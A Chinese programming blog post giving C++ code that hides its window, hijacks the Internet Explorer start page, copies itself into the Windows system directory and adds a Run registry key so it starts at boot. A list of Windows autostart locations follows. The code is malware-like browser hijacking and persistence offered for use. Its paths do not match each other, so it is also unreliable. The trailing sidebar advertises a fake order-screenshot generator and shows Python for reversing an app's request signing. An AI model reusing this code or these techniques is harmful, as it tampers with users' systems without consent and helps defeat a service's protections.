通过注册表修改IE主页、自复制和开机启动

最新推荐文章于 2025-06-26 17:42:14 发布
最新推荐文章于 2025-06-26 17:42:14 发布
阅读量278 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: VC 文章标签: IE Microsoft Windows XP Access
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iteye_20450/article/details/81930439
本文介绍了一种使用C++编程语言实现程序自启动的方法,包括如何修改注册表以达到程序随系统启动自动运行的目的,并提供了具体的代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

// AutoRun.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>

#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )

//用于修改字符串类型键值
void CreateStringReg(::HKEY hRoot, char* szSubKey, char* valueName, char* data) {
	HKEY hKey;
	//打开注册表键,不存在则创建它
	long lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegCreateKeyEx %s\n", szSubKey);
		return;
	}

	//修改注册表简直,没有则创建它
	lRet = RegSetValueEx(hKey, valueName, 0, REG_SZ, (BYTE*)data, strlen(data));
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegSetValueEx %s\n", valueName);
		return;
	}

	RegCloseKey(hKey);
}

//用于修改数字类型键值
void CreateDWORDReg(HKEY hRoot, char* szSubKey, char* valueName, DWORD data) {
	HKEY hKey;
	//打开注册表键,没有则创建它
	long lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegCreateKeyEx %s \n", szSubKey);
		return;
	}
	DWORD dwSize = sizeof(DWORD);
	//修改注册表键值,没有则创建他
	lRet = RegSetValueEx(hKey, valueName, 0, REG_DWORD, (BYTE*)&data, dwSize);
	if(lRet != ERROR_SUCCESS) {
		printf("error no RegSetValueEx %s \n", valueName);
		return;
	}

	RegCloseKey(hKey);
}


//修改IE首页
void modifyIEStartPage() {
	//要修改成的网址
	char startPage[255] = "http://pengranxiang.iteye.com/";
	//调用修改字符串类型键值的函数
	CreateStringReg(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\Main", "Start Page", startPage);
}

//程序自复制 到系统目录
void copyItself() {
	char modulePath[256];
	char sysPath[256];
	//取得程序名字
	GetModuleFileName(NULL, modulePath, 256);
	//取得系统根目录
	GetSystemDirectory(sysPath, 256);

	int ret = CopyFile(modulePath, strcat(sysPath, "\\AutoRun.exe"), TRUE);
	if(ret) {
		printf("%s has been copyed to sys dir %s \n", modulePath, sysPath);
	} else {
		printf("copy file error\n");
	}
}


int main(int argc, char* argv[])
{
	char regName[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
	char keyName[] = "AutoRun";
	char keyValue[] = "%systemroot%\\AutoRun.exe";
	//如果%systemroot%下有AutoRun.exe这个文件,那么系统启动时就自行运行
	CreateStringReg(HKEY_LOCAL_MACHINE, regName, keyName, keyValue);
	//复制自己到%systemroot%下面,名字AutoRun.exe
	copyItself();
	return 0;
}

 

系统自启动位置:两个文件夹和八个注册表位置

一、当前用户专有的启动文件夹

  这是许多应用软件自动启动的常用位置,Windows自动启动放入该文件夹的所有快捷方式。用户启动文件夹一般在:\Documents and Settings\<用户名字>\“开始”菜单\程序\启动,其中“<用户名字>”是当前登录的用户帐户名称。

 

二、对所有用户有效的启动文件夹

  这是寻找自动启动程序的第二个重要位置,不管用户用什么身份登录系统,放入该文件夹的快捷方式总是自动启动——这是它与用户专有的启动文件夹的区别所 在。该文件夹一般在:\Documents and Settings\All Users\“开始”菜单\程序\启动。

 

三、Load注册键

  介绍该注册键的资料不多,实际上它也能够自动启动程序。位置:HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows\load。

 

四、Userinit注册键


位置:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Userinit。 这里也能够使系统启动时自动初始化程序。通常该注册键下面有一个userinit.exe,如图一,但这个键允许指定用逗号分隔的多个程序,例如 “userinit.exe,OSA.exe”(不含引号)。

 

五、Explorer\Run注册键

  和load、Userinit不同,Explorer\Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都 有,具体位置 是:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,

和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run。

 

六、RunServicesOnce注册键

  RunServicesOnce注册键用来启动服务程序,启动时间在用户登录之前,而且先于其他通过注册键启动的程序。 RunServicesOnce注册键的位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce。

 

七、RunServices注册键

  RunServices注册键指定的程序紧接RunServicesOnce指定的程序之后运行,但两者都在用户登录之前。RunServices的 位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices。

 

八、RunOnce\Setup注册键

  RunOnce\Setup指定了用户登录之后运行的程序,它的位置 是:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup, 和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Setup。

 

九、RunOnce注册键

  安装程序通常用RunOnce键自动运行程序,它的位置在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

和 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce。

 

HKEY_LOCAL_MACHINE下面的RunOnce键会在用户登录之后立即运行程序,运行时机在其他Run键指定的程序之前。 HKEY_CURRENT_USER下面的RunOnce键在操作系统处理其他Run键以及“启动”文件夹的内容之后运行。

如果是XP,你还需要检查一下 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx。

 

十、Run注册键

  Run是自动运行程序最常用的注册键,位置 在:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,

和 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run。 HKEY_CURRENT_USER下面的Run键紧接HKEY_LOCAL_MACHINE下面的Run键运行,但两者都在处理“启动”文件夹之前。

 

 

得物的AI在线鉴定怎么实现的?
百态老人的博客
01-08 2320
用户上传商品的多张照片,系统通过高清镜头对商品进行360度全方位拍摄,捕捉商品的纹理、Logo几何形状、工艺等细节特征。这些照片会被输入到AI系统中进行分析。:得物的AI鉴别系统基于多年积累的查验鉴别研究和海量实物商品数据训练而成。该系统整合了数十亿级查验鉴别数据样本和庞大的实物商品数据库,利用细粒度感知、分层注意力机制、神经网络结构搜索等技术,快速分析商品的关键物理特性。:得物建立了覆盖13个消费品类、1500多个品牌、10万多种商品的正品样本库。
得物订单截图模拟器.apk
12-26
一款得物订单截图模拟器,多种模板可选,一键生成,简单快捷,满足你的各种需求,自定义商品信息、价格、收货地址等细节,高度还原真实订单,适用于社交分享、朋友间的玩笑,提升趣味性,本应用仅供娱乐。
得物 APP newSign分析
ff2766958292的博客
03-16 1437
得物、newSign、sign
另类的唯品会和得物比价
yjack007的专栏
02-22 6334
目前得物h5和小程序防爬弄得采集数据很费劲,另辟蹊径做了一款通过模拟器和商家后台方式采集数据的方式,目前实现了跟唯品会的比价。运行界面如下: 输入品牌名称,点击“开始”,表格中左边依次显示唯品会采集的数据,右边会根据采集模式的不同,从安卓模拟器或商家后台采集数据进行对比,确定不同尺码的价格,以及是否有利润,红色表示有利润,绿色表示没有。 支持从excel中导入数据和从唯品会获取数据,excel的数据格式必须保证第二列是货号,第七列是价格。 支持从模拟器和得物商家后台获取得物的价格信息: 模拟器模
得物数据采集
weixin_46348974的博客
04-01 2451
得物商品列表得物商品评价需要私聊。
得物薪资开了,比去年还猛。
沉默王二
01-02 3444
串行化是最高的隔离级别,通过强制事务串行执行来避免并发问题,可以解决“脏读”、“不可重复读”和“幻读”问题。TCP 是面向连接的,而 UDP 是无连接的。TCP 就像是打电话一对一私聊,UDP 就像是拿个大喇叭在广播(😂)。在数据传输开始之前,TCP 需要先建立连接,数据传输完成后,再断开连接。这个过程通常被称为“三次握手”、“四次挥手”。UDP 是无连接的,发送数据之前不需要建立连接,发送完毕也不需要断开,数据以数据报形式发送。
得物app数据 采集 交流
2501_91626781的博客
05-17 1542
2. 了解API文档:详细阅读得物API接口文档,了解各个接口的使用方法、请求参数、返回值等信息。1. 注册并创建应用程序:在得物开发者平台进行注册并创建一个应用程序,获取API密钥。3. 扩展性强:得物API接口支持多种编程语言和工具,方便开发者进行二次开发。4. 实时性高:得物API接口支持实时数据更新,确保获取到的数据最新、最准确。3. 调用API接口:根据实际需求,调用相应的API接口,并传入必要的参数。2. 高效便捷:API接口调用简单快捷,可快速实现数据的获取与处理。三、得物API接口优势。
Compareprice多平台跟得物比价
yjack007的专栏
06-03 9843
目前已经更新到1.3.0版本,支持线下店、唯品会和京东跟得物的比价,比价采用的是从模拟器上的app进行界面操作获取不同尺码的价格数据,目前支持夜神、雷电和网易等多款模拟器。
得物商品详情接口
weixin_38821240的博客
05-23 1965
=====================有需要可以联系(昵称)2023-06月份最近得物无风控详情接口。目前已经封装好接口,可以提供。
得物星云系统技术架构浅析
琪琪的博客
05-21 2410
DASS 层服务对外提供各种通用能力,APASS 层服务作为 DASS 层服务的底部支撑服务,不对外提供接口服务,属于星云内部能力,这样划分是为了让每个服务的能力边界和服务分层更加明确,也能缩小应用接口访问权限的管理,只有 DASS 层服务才需要接口权限申请。圈选 check 服务应对不同场景时使用了不同的数据层,有 hbase、redis、es 等,不同数据层都有自己的特点,不同场景的读写流量以及底层数据量是不一样的,选择合适的数据层很重要。
2023秋招得物面经 8.31总结
zj5566778899的博客
08-31 3473
1.数据结构中有哪些树    2.OSI7层网络,每一层具体做什么的    3.HTTP和HTTPS的区别    4.有哪些方式做多线程开发,需要注意哪些点    5.线程用一次就创建一次,然后销毁,怎么解决    6.IOC和DI    7.Set 怎么去保证去重的    8.Set 里面保存的是一个自定义的对象的话,对象应该有什么动作?    9.Redolog和Binlog区别
面试题得物1
08-08
【面试题得物1】涉及了众多IT领域的知识点,涵盖了Java、Kafka、RocketMQ、MySQL、Redis、算法和分布式等多个方面。以下是这些知识点的详细解释: 1. **数据库索引结构**:索引是数据库管理系统中用于提高查询速度...
唯品会得物商品比价工具
02-22
"唯品会得物商品比价工具"是一个用于比较唯品会与得物平台上同类商品价格的应用程序。这个工具利用了编程技术来自动化获取并分析两个电商平台上的商品价格,帮助消费者做出更明智的购物决策。以下是一些相关知识点:...
得物小程序sign参数加密方法
09-01
得物小程序sign参数加密方法 可以供大家学习但是不能用于非法用途,否则后果自负
微信小程序开发项目实例-得物的租借平台代码(源码).rar
05-21
在这个“微信小程序开发项目实例-得物的租借平台代码”中,我们将深入探讨如何利用微信小程序的开发工具和框架构建一个类似得物的租借平台。 首先,我们需要了解微信小程序的基础架构。它采用了JavaScript作为主要...
A3977SLPTR-T Allegro高精度电机驱动芯片 过电保护 3D打印机工业自动化无人机专用
最新发布
ssx83948880的博客
06-26 474
A3977SLPTR-T 是 Allegro MicroSystems(埃戈罗微电子) 推出的一款 步进电机驱动芯片,属于 DMOS微步进驱动器,集成了 PWM电流控制、保护电路和逻辑接口,适用于高精度步进电机控制应用
CKESC的ROCK 180A-H 无人机电调:100V 高压冗余设计与安全保护解析
UAV_ckesc的博客
06-25 633
南昌长空的ROCK 180A-H 电调以 110V 高压兼容性、九项安全保护机制及实时数据监控为核心优势,通过低内阻硬件设计与光电隔离抗干扰技术,实现复杂工况下的稳定运行。其可定制化参数(如保护温度、响应时间)与 IP55 防护等级,适配无人机高压动力系统的可靠性需求。
无人机螺旋桨机械能模块解析
YUNZHUO666的博客
06-26 831
匹配电机与工况:桨叶直径、桨距、数量必须与电机的KV值、功率特性以及无人机的典型飞行状态(悬停效率 vs 高速效率)精确匹配。**这是克服无人机重力(悬停)和空气阻力(前进)的主要力量。难点:不平衡、气动不对称、桨叶与气流/结构的相互作用都会产生有害振动,影响传感器精度、结构寿命、飞行稳定性和噪音。结构设计:优化铺层设计(碳纤方向)、内部加强结构(如梁、抗剪腹板)、合理的截面厚度分布以抵抗离心力和弯曲力矩。:推力- 用于提供升力、推进力,实现无人机的悬停、爬升、下降、前进、后退、横移等所有动作。
绝缘子故障检测数据集-无人机巡检 智能运维 2,100张图片
cver123的博客
06-26 1279
绝缘子故障检测数据集-无人机巡检 智能运维 2,100张图片
得物签名
03-12
<think>好的,我现在需要帮助用户了解或实现得物签名的相关技术,特别是签名算法的实现方式。首先,我需要收集已有的信息。根据用户提供的引用,特别是引用[4]和[5],得物的签名算法可能涉及逆向工程分析,使用了JavaScript中的XMLHttpRequest重写来拦截请求,并在请求中包含特定的sign参数。这可能意味着签名生成是在客户端进行的,通常在前端JavaScript代码中完成。 接下来,我应该考虑常见的签名生成方法。常见的Web应用签名算法通常使用HMAC、AES、RSA或自定义的哈希组合。引用[1]提到了RSA算法,但得物的签名可能更倾向于使用HMAC-SHA256之类的哈希算法,结合时间戳、随机数和请求参数进行签名,以防止篡改和重放攻击。 用户可能需要具体的步骤,比如逆向分析得物的JavaScript代码,找到生成sign的函数,提取关键参数和加密逻辑。引用[5]中的代码片段展示了如何重写XMLHttpRequest的open方法来拦截请求,这可能用于调试和定位签名生成的代码位置。 此外,引用[4]提到使用Python进行算法还原,所以可能需要在Python中复现JavaScript的签名生成逻辑。这通常涉及分析请求参数如何排序、拼接,以及如何与密钥结合进行哈希或加密。需要注意反爬机制,如obfuscation(代码混淆)或动态密钥,这可能需要使用AST(抽象语法树)解析或动态执行来还原算法。 用户可能还需要了解如何应对反调试措施,比如在Chrome开发者工具中使用断点调试,或者使用工具如Frida进行Hook。同时,引用[3]和[4]强调了法律和合规问题,确保研究仅用于学习目的,不用于非法用途。 最后,应该提醒用户注意法律风险,遵循网站的使用条款,避免侵犯知识产权或违反计算机安全法律。总结起来,实现得物签名需要逆向工程分析前端代码,提取关键算法,处理可能的混淆和反调试,最后用目标语言如Python复现算法。</think>### 得物签名算法实现方式分析 得物签名算法主要用于接口请求的身份验证和防篡改保护,常见实现方式涉及以下技术点: #### 1. **签名参数组成** 签名通常由以下参数动态生成: - 请求参数(经排序、过滤空值后拼接) - 时间戳(如:$timestamp=1620000000$) - 随机数(如:$nonce=5a8s3d$) - 设备指纹(如:$device\_id=abcdef$) - 应用密钥(加密盐值,可能动态获取)[^4] 示例参数拼接逻辑: $$ \text{sign\_str} = \text{path} + \text{sorted\_params} + \text{timestamp} + \text{nonce} $$ #### 2. **加密算法类型** 根据逆向分析,得物可能采用以下组合: - **HMAC-SHA256**:对拼接字符串进行哈希运算 - **AES/Base64编码**:对结果二次处理 - **自定义位移/异或操作**:增加逆向难度[^5] #### 3. **JavaScript代码混淆** 关键函数可能被混淆,例如: ```javascript function _0x12ab5(a, b) { return a ^ b << 3; } // 需要AST解析还原控制流 ``` #### 4. **Python算法还原示例** ```python import hmac import hashlib def generate_sign(params, secret_key): # 1. 参数排序并拼接 sorted_str = '&'.join([f"{k}={v}" for k,v in sorted(params.items())]) # 2. HMAC-SHA256加密 sign = hmac.new(secret_key.encode(), sorted_str.encode(), hashlib.sha256).hexdigest() # 3. 自定义处理(示例) return sign.upper() + str(int(time.time())) ``` #### 5. **反爬对抗措施** - 动态密钥:通过接口定期更新加密盐值 - 环境检测:验证是否在真机环境运行 - 请求频率限制:异常高频触发验证码[^5]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值